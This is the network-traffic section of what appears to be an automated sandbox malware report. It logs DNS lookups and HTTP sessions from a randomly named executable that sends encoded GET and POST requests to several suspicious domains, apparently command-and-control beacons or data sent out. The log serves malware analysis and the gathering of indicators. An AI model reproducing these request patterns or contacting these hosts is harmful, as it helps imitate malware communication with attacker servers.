                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 17, 2024 03:40:53.204112053 CET1.1.1.1192.168.2.50x90c1No error (0)www.northidahoscans.online208.91.197.27A (IP address)IN (0x0001)false
                                                Dec 17, 2024 03:41:10.574491978 CET1.1.1.1192.168.2.50x69a8No error (0)www.brickhills.site103.224.182.242A (IP address)IN (0x0001)false
                                                Dec 17, 2024 03:41:25.547740936 CET1.1.1.1192.168.2.50xa80dNo error (0)www.pin-ballerz.netpin-ballerz.netCNAME (Canonical name)IN (0x0001)false
                                                Dec 17, 2024 03:41:25.547740936 CET1.1.1.1192.168.2.50xa80dNo error (0)pin-ballerz.net199.15.251.162A (IP address)IN (0x0001)false
                                                Dec 17, 2024 03:41:40.871130943 CET1.1.1.1192.168.2.50x4d33No error (0)www.allstary.top199.193.6.134A (IP address)IN (0x0001)false
                                                Dec 17, 2024 03:41:41.025144100 CET1.1.1.1192.168.2.50x4d33No error (0)www.allstary.top199.193.6.134A (IP address)IN (0x0001)false
                                                Dec 17, 2024 03:41:55.969944000 CET1.1.1.1192.168.2.50xd2d2No error (0)www.waytoocool.life52.60.87.163A (IP address)IN (0x0001)false
                                                Dec 17, 2024 03:42:11.641071081 CET1.1.1.1192.168.2.50xf526No error (0)www.timai.shopjust-do-public-0526-cpdhe.jiexi-010.topCNAME (Canonical name)IN (0x0001)false
                                                Dec 17, 2024 03:42:11.641071081 CET1.1.1.1192.168.2.50xf526No error (0)just-do-public-0526-cpdhe.jiexi-010.top18.166.177.211A (IP address)IN (0x0001)false
                                                Dec 17, 2024 03:42:11.684582949 CET1.1.1.1192.168.2.50xf526No error (0)www.timai.shopjust-do-public-0526-cpdhe.jiexi-010.topCNAME (Canonical name)IN (0x0001)false
                                                Dec 17, 2024 03:42:11.684582949 CET1.1.1.1192.168.2.50xf526No error (0)just-do-public-0526-cpdhe.jiexi-010.top18.166.177.211A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • www.northidahoscans.online
                                                • www.brickhills.site
                                                • www.pin-ballerz.net
                                                • www.allstary.top
                                                • www.waytoocool.life
                                                • www.timai.shop

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549764208.91.197.27804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:40:53.342633963 CET395OUTGET /lvnw/?-V8=PnfuVDu+NOzkAh7O+7Vj27VnnoRWHWCWtKII0z0YG5WqqHdwEfQqR5XVQmQd5mG7F2k9Soh0q42Pqx1rEU++5lE1fyewpKHAvlydGXlffERlJmNtF5QLa6mLyqy4r6QOPw==&2H=b6QHb8C0WpQhtV HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                Host: www.northidahoscans.online
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Dec 17, 2024 03:40:55.006685972 CET1236INHTTP/1.1 200 OK
                                                Date: Tue, 17 Dec 2024 02:40:54 GMT
                                                Server: Apache
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                Set-Cookie: vsid=904vr48194885448939503; expires=Sun, 16-Dec-2029 02:40:54 GMT; Max-Age=157680000; path=/; domain=www.northidahoscans.online; HttpOnly
                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_k/pYroBFreHj3RjKc85enyaL7PjGUHs3IMcCVszmvyaeb/C3C+Z263Qg9qa4uLfp04Lvk7ju2GOJ3Fmv5SUR2A==
                                                Content-Length: 2650
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 6b 2f 70 59 72 6f 42 46 72 65 48 6a 33 52 6a 4b 63 38 35 65 6e 79 61 4c 37 50 6a 47 55 48 73 33 49 4d 63 43 56 73 7a 6d 76 79 61 65 62 2f 43 33 43 2b 5a 32 36 33 51 67 39 71 61 34 75 4c 66 70 30 34 4c 76 6b 37 6a
                                                Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_k/pYroBFreHj3RjKc85enyaL7PjGUHs3IMcCVszmvyaeb/C3C+Z263Qg9qa4uLfp04Lvk7j
                                                Dec 17, 2024 03:40:55.006721973 CET1236INData Raw: 75 32 47 4f 4a 33 46 6d 76 35 53 55 52 32 41 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69
                                                Data Ascii: u2GOJ3Fmv5SUR2A=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.northidahoscans.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.northidahoscans.online/px.js
                                                Dec 17, 2024 03:40:55.006757975 CET1174INData Raw: 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20
                                                Data Ascii: </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices -->


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.549805103.224.182.242804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:41:10.722001076 CET649OUTPOST /q6c0/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 204
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.brickhills.site
                                                Origin: http://www.brickhills.site
                                                Referer: http://www.brickhills.site/q6c0/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 4f 50 41 54 45 68 6c 45 44 45 63 74 70 6f 69 4c 2b 66 63 72 41 2f 42 6e 43 45 53 63 64 55 67 49 39 39 32 33 49 66 2f 4a 4f 2b 74 4f 32 69 63 7a 68 47 61 73 39 6f 70 76 38 4b 70 2b 52 51 4f 4e 78 66 6a 53 71 4e 37 34 6d 6d 65 38 48 56 67 49 6f 6a 47 4d 43 56 49 6b 2b 6a 41 79 2b 66 47 75 4e 55 6c 6b 2f 6c 6a 6f 71 6c 33 6c 58 2b 4c 7a 43 37 46 45 5a 70 74 2b 4f 37 41 6d 4f 4c 69 71 4c 4e 46 4b 58 71 51 74 4c 76 33 57 4b 66 33 4a 4a 65 56 6f 57 41 38 78 6f 6b 64 41 4a 5a 66 4d 2f 52 5a 63 4e 72 79 38 74 35 4e 67 6d 69 2b 31 6a 54 38 6a 31 4e 35 44 4f 6a 62 4c 37 38 38 2b 4f 53 53 58 67 30 51 3d
                                                Data Ascii: -V8=OPATEhlEDEctpoiL+fcrA/BnCEScdUgI9923If/JO+tO2iczhGas9opv8Kp+RQONxfjSqN74mme8HVgIojGMCVIk+jAy+fGuNUlk/ljoql3lX+LzC7FEZpt+O7AmOLiqLNFKXqQtLv3WKf3JJeVoWA8xokdAJZfM/RZcNry8t5Ngmi+1jT8j1N5DOjbL788+OSSXg0Q=
                                                Dec 17, 2024 03:41:11.932759047 CET874INHTTP/1.1 200 OK
                                                date: Tue, 17 Dec 2024 02:41:11 GMT
                                                server: Apache
                                                set-cookie: __tad=1734403271.6175629; expires=Fri, 15-Dec-2034 02:41:11 GMT; Max-Age=315360000
                                                vary: Accept-Encoding
                                                content-encoding: gzip
                                                content-length: 579
                                                content-type: text/html; charset=UTF-8
                                                connection: close
                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 72 25 26 69 50 e4 bf 8f 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 f7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 5b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 95 c4 fc ee 5a ce f2 cf c9 22 8a f2 1c 6e 91 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 f7 28 b7 84 0c 7c e4 01 d5 00 b5 08 2f e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b 9b b1 54 3a 85 87 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 35 db 87 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 67 27 df 6f 59 87 a8 d3 87 ce 1a 45 96 43 ab 79 90 ed f1 18 [TRUNCATED]
                                                Data Ascii: TMo0=pvNQ;a"Yr%&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'[h'8CI2(!iyZ"n@6p5A5(|/Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#5`'kMs\g'oYECy2$&ZB3}j#:vobIRnz:}_tM/<57v#0zqx-r%aa[&0c.:l8UR}|-:"|-xU2fnOqbG.>UC//z0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.549812103.224.182.242804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:41:13.387609005 CET669OUTPOST /q6c0/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 224
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.brickhills.site
                                                Origin: http://www.brickhills.site
                                                Referer: http://www.brickhills.site/q6c0/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 4f 50 41 54 45 68 6c 45 44 45 63 74 34 38 65 4c 38 38 6b 72 48 66 42 67 47 30 53 63 47 6b 67 55 39 39 79 33 49 64 54 5a 4e 4d 35 4f 31 47 59 7a 7a 55 79 73 2b 6f 70 76 76 4b 70 37 56 51 4f 57 78 66 76 77 71 49 37 34 6d 6d 36 38 48 51 63 49 6f 30 53 50 54 56 49 6d 6d 54 41 38 7a 2f 47 75 4e 55 6c 6b 2f 6c 33 47 71 6c 76 6c 58 75 37 7a 59 65 78 48 51 4a 74 35 59 72 41 6d 5a 62 69 75 4c 4e 46 53 58 6f 30 48 4c 73 66 57 4b 64 76 4a 49 50 56 6e 42 77 38 2f 33 30 63 32 43 62 4f 69 36 54 46 44 4a 36 6d 31 31 4a 46 76 6e 55 50 66 35 78 30 4c 6d 74 56 37 65 77 54 38 71 4d 64 58 55 78 43 6e 2b 6a 48 64 70 59 75 4d 45 39 56 4d 48 30 55 6f 51 35 4b 62 4a 77 6d 61
                                                Data Ascii: -V8=OPATEhlEDEct48eL88krHfBgG0ScGkgU99y3IdTZNM5O1GYzzUys+opvvKp7VQOWxfvwqI74mm68HQcIo0SPTVImmTA8z/GuNUlk/l3GqlvlXu7zYexHQJt5YrAmZbiuLNFSXo0HLsfWKdvJIPVnBw8/30c2CbOi6TFDJ6m11JFvnUPf5x0LmtV7ewT8qMdXUxCn+jHdpYuME9VMH0UoQ5KbJwma
                                                Dec 17, 2024 03:41:14.610407114 CET874INHTTP/1.1 200 OK
                                                date: Tue, 17 Dec 2024 02:41:14 GMT
                                                server: Apache
                                                set-cookie: __tad=1734403274.7988264; expires=Fri, 15-Dec-2034 02:41:14 GMT; Max-Age=315360000
                                                vary: Accept-Encoding
                                                content-encoding: gzip
                                                content-length: 579
                                                content-type: text/html; charset=UTF-8
                                                connection: close
                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 72 25 26 69 50 e4 bf 8f 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 f7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 5b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 95 c4 fc ee 5a ce f2 cf c9 22 8a f2 1c 6e 91 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 f7 28 b7 84 0c 7c e4 01 d5 00 b5 08 2f e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b 9b b1 54 3a 85 87 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 35 db 87 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 67 27 df 6f 59 87 a8 d3 87 ce 1a 45 96 43 ab 79 90 ed f1 18 [TRUNCATED]
                                                Data Ascii: TMo0=pvNQ;a"Yr%&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'[h'8CI2(!iyZ"n@6p5A5(|/Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#5`'kMs\g'oYECy2$&ZB3}j#:vobIRnz:}_tM/<57v#0zqx-r%aa[&0c.:l8UR}|-:"|-xU2fnOqbG.>UC//z0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.549818103.224.182.242804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:41:16.060264111 CET1686OUTPOST /q6c0/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1240
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.brickhills.site
                                                Origin: http://www.brickhills.site
                                                Referer: http://www.brickhills.site/q6c0/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 4f 50 41 54 45 68 6c 45 44 45 63 74 34 38 65 4c 38 38 6b 72 48 66 42 67 47 30 53 63 47 6b 67 55 39 39 79 33 49 64 54 5a 4e 4d 68 4f 32 7a 4d 7a 68 6c 79 73 2f 6f 70 76 73 4b 70 36 56 51 4f 62 78 62 44 30 71 49 2f 43 6d 6b 79 38 48 31 51 49 34 51 2b 50 61 56 49 6d 36 6a 41 39 2b 66 48 30 4e 58 64 67 2f 6c 6e 47 71 6c 76 6c 58 74 6a 7a 4f 62 46 48 53 4a 74 2b 4f 37 42 79 4f 4c 69 47 4c 4e 64 6f 58 6f 77 39 4c 38 2f 57 4b 39 2f 4a 4f 39 74 6e 44 51 38 71 32 30 63 2b 43 62 43 68 36 54 5a 48 4a 37 6a 6f 31 4c 56 76 71 54 6d 35 70 53 4d 77 39 4e 52 49 56 57 37 6a 72 4d 52 4e 66 51 33 57 78 69 54 54 32 37 4b 50 4b 4e 78 78 54 77 46 44 4c 2b 47 30 4a 30 7a 54 74 57 4c 2f 42 6f 57 30 53 4f 30 74 33 52 77 45 6f 37 73 47 33 43 61 76 6f 43 68 75 74 54 32 69 4d 56 51 53 51 43 51 30 63 72 39 37 48 4d 72 4f 42 4f 34 70 6b 37 6b 43 58 6a 66 74 6e 43 2b 67 47 79 4b 4a 73 64 44 65 32 49 35 33 33 53 49 4e 2f 4e 2f 4a 36 46 45 65 73 35 75 72 4d 51 55 74 64 4b 34 46 70 4c 41 45 42 34 78 4a 50 7a 64 4e 73 53 [TRUNCATED]
                                                Data Ascii: -V8=OPATEhlEDEct48eL88krHfBgG0ScGkgU99y3IdTZNMhO2zMzhlys/opvsKp6VQObxbD0qI/Cmky8H1QI4Q+PaVIm6jA9+fH0NXdg/lnGqlvlXtjzObFHSJt+O7ByOLiGLNdoXow9L8/WK9/JO9tnDQ8q20c+CbCh6TZHJ7jo1LVvqTm5pSMw9NRIVW7jrMRNfQ3WxiTT27KPKNxxTwFDL+G0J0zTtWL/BoW0SO0t3RwEo7sG3CavoChutT2iMVQSQCQ0cr97HMrOBO4pk7kCXjftnC+gGyKJsdDe2I533SIN/N/J6FEes5urMQUtdK4FpLAEB4xJPzdNsSputbcw2dwN6aRz82MKKHk0Ys313q15LmgYc78sdVBiep9mBdTLzPNw0/RgdFA60GZnByBh566jrOY6H/38wRQyaUXeHtHm40Gg2F2fa+WYhAsGq8CBCq9Sl0rhwNYg1o/c9w8fdE1stAOUhKq0yZ5D03tt+066q6TQ2gEir172JPZ12T6+6ltxIX3AfqMuQ3NqQLrCfkcg2HVCI8iYeCJgIcMAj9Sdi1QLvgWqAUasT4ubgUEM0nTWXq0GZJc+MN4bNnDsNUuQ49gKHHIF18po0P2WxfH3tekWVy2qjTB0D3yGSs2ZpjvjmJ/dwh+73SjMT6XEcUWt267AN2m4dAFZ7r1iR2aa34uvCRQd5+l4AC4YvV9a3yF0hKJdo5dwJotpH+uvHtQL52kGtONJFnC5Bl02AQiEoH7gkvOokrRQsPmRoz3NEAzyAX5As+ykO/3kdeQ187BMmKvKBbTYLg0dJf8gomn9Bomc3DqW5FdPtI0n/g9XG3wxiVmlUkpX78tRF2moHeLbZWWZfplQkB9kRpsB6WPbBrpcmSu3nDq9JbjUkh5A9D8JBglP3C3da8O4lJXcGbfOcNi7llXI4NR7hXzaRCi7Ku5GTbzmTFHBCLunMC4H8m3ESl6BaEP8bcY4BiLdjluuxi+h7YsSD7wW0NfTA+aThLAx [TRUNCATED]
                                                Dec 17, 2024 03:41:17.322793961 CET874INHTTP/1.1 200 OK
                                                date: Tue, 17 Dec 2024 02:41:17 GMT
                                                server: Apache
                                                set-cookie: __tad=1734403277.4596934; expires=Fri, 15-Dec-2034 02:41:17 GMT; Max-Age=315360000
                                                vary: Accept-Encoding
                                                content-encoding: gzip
                                                content-length: 579
                                                content-type: text/html; charset=UTF-8
                                                connection: close
                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 72 25 26 69 50 e4 bf 8f 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 f7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 5b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 95 c4 fc ee 5a ce f2 cf c9 22 8a f2 1c 6e 91 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 f7 28 b7 84 0c 7c e4 01 d5 00 b5 08 2f e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b 9b b1 54 3a 85 87 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 35 db 87 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 67 27 df 6f 59 87 a8 d3 87 ce 1a 45 96 43 ab 79 90 ed f1 18 [TRUNCATED]
                                                Data Ascii: TMo0=pvNQ;a"Yr%&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'[h'8CI2(!iyZ"n@6p5A5(|/Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#5`'kMs\g'oYECy2$&ZB3}j#:vobIRnz:}_tM/<57v#0zqx-r%aa[&0c.:l8UR}|-:"|-xU2fnOqbG.>UC//z0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.549825103.224.182.242804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:41:18.727762938 CET388OUTGET /q6c0/?-V8=DNozHXZRHwMop+WB0qwfBKpxfEH+ejoTyKy7EOTXMNRX1xYPjRGOw4JAj4pefwWAxfS0q+PDkH37PQMlxyuVDnop3GMN8cH/UXRq5XDzrWyHO52OJthmQYZMV7gmULD6fQ==&2H=b6QHb8C0WpQhtV HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                Host: www.brickhills.site
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Dec 17, 2024 03:41:19.988640070 CET1236INHTTP/1.1 200 OK
                                                date: Tue, 17 Dec 2024 02:41:19 GMT
                                                server: Apache
                                                set-cookie: __tad=1734403279.1270829; expires=Fri, 15-Dec-2034 02:41:19 GMT; Max-Age=315360000
                                                vary: Accept-Encoding
                                                content-length: 1537
                                                content-type: text/html; charset=UTF-8
                                                connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 62 72 69 63 6b 68 69 6c 6c 73 2e 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 62 72 69 63 6b 68 69 6c 6c 73 2e 73 69 74 65 2f 71 36 63 30 2f 3f 2d 56 38 3d 44 4e 6f 7a 48 58 5a 52 48 77 4d 6f 70 2b 57 42 30 71 77 66 42 4b 70 78 66 45 48 2b 65 6a 6f 54 79 4b 79 37 45 4f 54 58 4d 4e 52 58 31 78 59 50 6a 52 47 4f 77 34 4a 41 6a 34 70 65 66 77 57 41 78 66 53 30 71 2b 50 44 6b 48 33 37 50 51 4d 6c 78 79 75 56 44 6e 6f 70 33 47 4d 4e 38 63 48 2f 55 58 52 71 35 58 44 7a 72 57 79 48 4f 35 32 4f 4a 74 68 6d 51 59 5a 4d 56 37 67 6d 55 4c 44 36 [TRUNCATED]
                                                Data Ascii: <html><head><title>brickhills.site</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.brickhills.site/q6c0/?-V8=DNozHXZRHwMop+WB0qwfBKpxfEH+ejoTyKy7EOTXMNRX1xYPjRGOw4JAj4pefwWAxfS0q+PDkH37PQMlxyuVDnop3GMN8cH/UXRq5XDzrWyHO52OJthmQYZMV7gmULD6fQ==&2H=b6QHb8C0WpQhtV&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><bod
                                                Dec 17, 2024 03:41:19.988773108 CET573INData Raw: 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77
                                                Data Ascii: y bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.brickhills.site/q6c0/?-V8=DNozHXZRHwMop+WB0qwfBKpxfEH+ejoTyKy7EOTXMNRX1xYPjRGOw4JAj4pefwWAxfS0q+PDkH37PQMlxyuVDnop3GMN8cH/UXRq5XDzrWyHO52OJthmQYZMV7gmULD6fQ==&


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.549844199.15.251.162804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:41:25.685750008 CET649OUTPOST /ocjg/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 204
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.pin-ballerz.net
                                                Origin: http://www.pin-ballerz.net
                                                Referer: http://www.pin-ballerz.net/ocjg/
